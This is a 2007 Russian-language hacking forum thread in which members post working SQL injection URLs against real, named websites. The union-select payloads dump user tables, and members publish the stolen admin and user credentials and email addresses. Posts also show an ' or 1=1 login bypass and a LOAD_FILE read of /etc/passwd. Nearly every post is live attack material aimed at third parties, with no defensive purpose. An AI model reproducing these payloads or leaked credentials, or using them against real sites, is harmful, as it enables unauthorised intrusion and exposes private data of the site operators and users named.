Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
01.07.2007, 20:01
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
2злюка
Код:
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,3,4,5/
эх найти бы таблицу юзеров
tbl_user
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,count(1),4,5+from+tbl_user/*
95167 записей
http://www.sportsguns.co.uk/addpage.php?page_id=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5+from+tbl_user+limit+0,1/*
admin:highstreet4013
админка
http://www.sportsguns.co.uk/login.php
-----------------------------------------------------------------
NOmeR1
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/*
Хм.. Наверно там больше нет =\ Даже файлы прочитать не смог..
вот-с
http://www.arcteryx.nu/butiken/product.php?uid=-720+union+select+1,concat_ws(0x3a,name,email,passw d),3,4,5,6,7,8,9,10,11,12,13,14+from+users+limit+0 ,1/*
ROBERT JONASSON:BMF_RIPPER@HOTMAIL.COM:4TWCPP
можно залогиниться тут - http://www.arcteryx.nu/butiken/login.php - но хз что с этим делать, я по голандски не умею, надо Хиддинка спросить)
------------------------------------------------------------------------
iv.
Подбираем кол-во колонок: Цитата:http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/* Version: MySQL 5.1.19-beta User: nvmu@localhost Database: nvmu Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
можно нормально вывести здесь
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,table_name+from+informa tion_schema.tables+limit+35,1/*
есть табличка members
http://nvmu.ru/cgi-bin/news.cgi?id=-bzU1UjCC'+union+select+1,2,concat_ws(0x3a,login,pa ssword,email)+from+members+limit+0,1/*
Borisov:3788:s_nahim@inbox.ru
еще примечательно, что можно авторизироваться просто введя ' or 1=1/* вместо логина плюс произвольный пароль 
-----------------------------------------------------------------------
[PS] что-то везде пароли хранятся в открытом виде
Последний раз редактировалось Серенький; 01.07.2007 в 20:49..
|
|
|
02.07.2007, 15:07
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\
|
|
|
|
02.07.2007, 15:19
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://www.worldteamtennis.com/
Офф сайт WTT(только чёт PR 4)
Код:
http://www.worldteamtennis.com/news/news_info.asp?news_id=-251+union+select+1,2,3,password,username,6,7,8,9+from+users
Одновременно username и password выводить не хочет. Надо по отдельности.
User: admin
Password: 2$$7#newsx
Админку не нашёл...
Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...
Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
|
|
|
|
02.07.2007, 16:09
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от Ky3bMu4
Вот ещё сайтец с доступом в user , то только выводить ничё не хочет...
Код:
http://www.yourmajesty.net/News_selec.asp?News_ID=-116+union+select+1,2,3,4,5,6,7,8+from+user
Это MSSQL. Это не правильный вывод и там нет User.
|
|
|
|
02.07.2007, 17:50
|
|
Познающий
Регистрация: 02.07.2007
Сообщений: 34
Провел на форуме:
446543
Репутация:
29
|
|
вношу свои =)
Код:
http://www.ji-association.org/news.phtml?id=-1+union+select+VERSION(),2,3,4,5,USER(),7,8,9,10+from+users/*
Код:
http://www.cosmopolitan.kz/content.php?idpart=3&idnum=-1+union+select+1,2,3,VERSION(),USER(),6,7,8/*
Код:
http://slt-tosol.ru/catalog.php?id=-1+union+select+1,VERSION(),USER(),4,5,6,7,8/*
|
|
|
|
02.07.2007, 15:49
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
Spyder
Цитата:http://www.qb4q.com/vacation.php?wid=-14+union+select+1,version(),3,4,5,6,7,8,9,0,11,12, 13,14
=\
никак не смог подобрать колонку с пассом..\
а табличка мемберс:
http://www.qb4q.com/vacation.php?wid=-14+union+select+1,2,3,4,5,6,7,8,9,0,11,concat_ws(0 x3a,name,email),13,14+from+members/*
Последний раз редактировалось Серенький; 02.07.2007 в 16:01..
|
|
|
|
02.07.2007, 19:34
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,password,user,5+from+mysql.user/*
как мне и посоветовал iv буду развивть скули
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать 
Последний раз редактировалось Extremal; 02.07.2007 в 20:48..
|
|
|
|
02.07.2007, 20:01
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
Сообщение от Extremal
Ещё 1
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),user,5+from+mysql.user/*
1ая мой sql которую более мение получилось создать
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*
Последний раз редактировалось kair; 02.07.2007 в 20:03..
|
|
|
|
02.07.2007, 20:17
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
Провел на форуме:
2441743
Репутация:
222
|
|
Ещё 2 нашел
Код:
http://megaload.megalan.tv/catalog.php?id=-1+union+select+1,2,3,4,5,6,USER(),version()/*
Код:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,user(),DATABASE()/*
Из за своего малого опыта в скуль инъекциях ни че подобрать не удалось...может у вас чё нить получиться
Последний раз редактировалось Extremal; 02.07.2007 в 20:44..
|
|
|
|
03.07.2007, 00:01
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от kair
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,VERSION(),concat(password,char(58),user),5+from+mysql%20.user/*
root:0a53c31a74397e18
Так лучше:
username = "root";
password = "jd4495jv";
таблица:
Код:
http://www.clarkhealthdept.org/news.phtml?id=-1+union+select+1,2,3,concat(username,0x3a,password),5+from+meg.admin/*
админка закрыта на уровне htaccess 
http://www.clarkhealthdept.org/admin
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Комбинированный вид